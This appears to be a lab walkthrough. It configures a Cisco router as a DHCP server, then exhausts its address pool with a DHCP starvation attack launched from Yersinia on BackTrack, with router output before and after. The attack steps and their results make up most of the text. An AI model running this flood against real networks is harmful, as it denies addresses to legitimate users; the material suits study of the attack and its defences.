Configure Cisco Router as DHCP
R1(config)#ip dhcp excluded-address 192.168.1.1 192.168.1.10
R1(config)#ip dhcp pool MYPOOL
R1(dhcp-config)#default-router 192.168.1.1
R1(dhcp-config)#dns-server 192.168.1.1
R1(dhcp-config)#domain-name microsoft.com
R1(dhcp-config)#network 192.168.1.0 /24
R1(dhcp-config)#exit
Configure Interface
R1(config)#interface fastEthernet 0/0
R1(config-if)#ip address 192.168.1.1 255.255.255.0
R1(config-if)#no shutdown
Verify Configuration
R1#show ip dhcp binding
Bindings from all pools not associated with VRF:
IP address Client-ID/ Lease expiration Type
Hardware address/
User name
192.168.1.11 0108.0027.5351.11 Mar 02 2002 12:04 AM Automatic
192.168.1.12 0102.004c.4f4f.50 Mar 02 2002 12:08 AM Automatic
R1#show ip dhcp pool
Pool MYPOOL :
Utilization mark (high/low) : 100 / 0
Subnet size (first/next) : 0 / 0
Total addresses : 254
Leased addresses : 2
Pending event : none
1 subnet is currently in the pool :
Current index IP address range Leased addresses
192.168.1.12 192.168.1.1 - 192.168.1.254 1
R1#show ip dhcp server statistics
Memory usage 24329
Address pools 1
Database agents 0
Automatic bindings 2
Manual bindings 0
Expired bindings 0
Malformed messages 0
Secure arp entries 0
Message Received
BOOTREQUEST 0
DHCPDISCOVER 2
DHCPREQUEST 2
DHCPDECLINE 0
DHCPRELEASE 0
DHCPINFORM 2
Message Sent
BOOTREPLY 0
DHCPOFFER 2
DHCPACK 4
DHCPNAK 0
We Have only 2 DHCP Client.
Now Get Start The DHCP Discovery Attack Using Yersinia 0.7.1 .
Verify Interface Configuration
root@bt:~# ifconfig eth0
eth0 Link encap:Ethernet HWaddr 08:00:27:9d:cb:38
inet addr:192.168.1.2 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe9d:cb38/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1011 errors:0 dropped:0 overruns:0 frame:0
TX packets:2638752 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:153749 (153.7 KB) TX bytes:753163338 (753.1 MB)
Interrupt:10 Base address:0xd020
root@bt:~# yersinia -G
Opens Graphical Interface
Click "Lunch attack"
Select "DHCP" And Than "Send DISCOVERY Packet"
Now Cheack Router
Monitor and Verify Cisco Router
R1#debug ip dhcp server packet
*Mar 1 00:30:44.043: DHCPD: Sending DHCPOFFER to client b870.fe70.9c15 (192.168.1.64).
*Mar 1 00:30:44.047: DHCPD: broadcasting BOOTREPLY to client b870.fe70.9c15.
*Mar 1 00:30:44.087: DHCPD: DHCPDISCOVER received from client 33d7.f461.f513 on interface FastEthernet0/0.
*Mar 1 00:30:44.095: DHCPD: Allocate an address without class information (192.168.1.0)
R1#un all
R1#show ip dhcp pool
Pool MYPOOL :
Utilization mark (high/low) : 100 / 0
Subnet size (first/next) : 0 / 0
Total addresses : 254
Leased addresses : 244
Pending event : none
1 subnet is currently in the pool :
Current index IP address range Leased addresses
0.0.0.0 192.168.1.1 - 192.168.1.254 244
R1#show ip dhcp server statistics
Memory usage 55845
Address pools 1
Database agents 0
Automatic bindings 132
Manual bindings 0
Expired bindings 124
Malformed messages 0
Secure arp entries 0
Message Received
BOOTREQUEST 0
DHCPDISCOVER 5424
DHCPREQUEST 2
DHCPDECLINE 0
DHCPRELEASE 0
DHCPINFORM 2
Message Sent
BOOTREPLY 0
DHCPOFFER 256
DHCPACK 4
DHCPNAK 0
R1#show ip dhcp binding
Bindings from all pools not associated with VRF:
IP address Client-ID/ Lease expiration Type
Hardware address/
User name
192.168.1.11 0108.0027.5351.11 Mar 02 2002 12:04 AM Automatic
192.168.1.12 0102.004c.4f4f.50 Mar 02 2002 12:08 AM Automatic
192.168.1.39 6909.b30f.bfae Mar 01 2002 12:43 AM Automatic
<Lines Omitted>
192.168.1.253 5084.9a4f.901e Mar 01 2002 12:42 AM Automatic
192.168.1.254 6440.0969.6d16 Mar 01 2002 12:42 AM Automatic
All Pool Addresses are used.
Done !
##########################################################################################################
